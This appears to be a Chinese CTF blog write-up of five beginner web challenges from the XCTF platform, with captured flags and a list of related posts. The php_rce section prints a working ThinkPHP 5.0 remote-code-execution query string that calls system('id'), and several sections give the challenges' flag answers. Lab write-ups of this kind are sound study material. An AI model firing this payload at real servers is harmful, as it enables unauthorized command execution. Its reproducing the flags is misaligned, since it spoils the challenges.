baby_web

初始页面
第一反应是index.php
输入发现不对
那就用御剑扫一扫
扫不到任何有用的东西
那就F12一下

可以看到发过来的包里是有index.php的
flag{very_baby_web}
get it

Training-WWW-Robots

robots
想到了robots协议
话不多说访问一下呗

出现了一个路径
访问一下
cyberpeace{0b68a74e7506d5f6349a437023b041be}
get it

php_rce

不知道rce是啥百度了一下
大概是漏洞
给了php的版本
ThinkPHP V5
去找找看有无什么漏洞
去网上找了一个5.0的漏洞利用语句

返回结果给了具体的版本号

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

ls查看目录
没什么有用的信息就继续往上查
找到flag
但是貌似直接查找flag也行
flag{thinkphp5_rce}
get it

Web_php_include

传参数查看目录
使用linux命令访问
查看网页源码找到flag
get it

ics-06

发现只有报表中心可以点开
看到url有个id
爆破试试

就它突出

cyberpeace{e4130164b5b97ade9aaeff8c28c16060}
get it

end
下机
吃饭

CTF:攻防世界web PART01相关推荐

攻防世界web高手进阶php_rce,[CTF]攻防世界web高手进阶区Writeup(更行ing)
baby_web EMMMM,这就是一个签到题~ 解题方法: F12→Networks→刷新抓包→完成 Training-WWW-Robots 看题目可以知道这道题考的是爬虫协议(robots.txt ...
《CTF攻防世界web题》之我什么都不会（1）
前言
攻防世界 web高手进阶区 9分题 favorite_number
前言继续ctf的旅程开始攻防世界web高手进阶区的9分题本文是favorite_number的writeup 解题过程进入界面简单的代码审计首先是个判断,既要数组强等于,又要首元素不等然 ...
攻防世界 web高手进阶区 10分题 weiphp
前言继续ctf的旅程开始攻防世界web高手进阶区的10分题本文是weiphp的writeup 解题过程进入界面点击进入一个登陆界面没有注册那肯定得找源码了惯例源码+御剑发现git泄 ...
攻防世界Web题 - unseping 总结
攻防世界Web题 - unseping 总结 1.审题进入题目,可以看出来是典型的php反序列化题目. 2.源代码分析 <?php highlight_file(__FILE__); //显示 ...
攻防世界 web高手进阶区 8分题 Web_python_block_chain
前言继续ctf的旅程开始攻防世界web高手进阶区的8分题本文是Web_python_block_chain的writeup 解题过程这是个区块链题这..裂开了啊没搞过区块链从零开始学习 ...
攻防世界 web高手进阶区 9分题 bilibili
前言继续ctf的旅程开始攻防世界web高手进阶区的9分题本文是bilibili的writeup 解题过程进来界面这尼玛出题人是黑还是粉啊笑死看题目意思是买lv6 惯例源码+御剑没发现什 ...
攻防世界 web高手进阶区 7分题Confusion1
前言继续ctf的旅程开始攻防世界web高手进阶区的7分题本文是Confusion1的writeup 解题过程进来的界面如下 (后来知道是php vs python的意思,也就是给提示跟pyth ...
攻防世界-web高手进阶区
文章目录攻防世界-web高手进阶区 1.baby_web 2.Training-WWW-Robots 3.Web_php_include (文件包含+伪协议) 1.方法 2.方法 4.ics-06( ...

CTF:攻防世界web PART01

攻防世界web PART01

baby_web

Training-WWW-Robots

php_rce

Web_php_include

ics-06

CTF:攻防世界web PART01相关推荐

最新文章

热门文章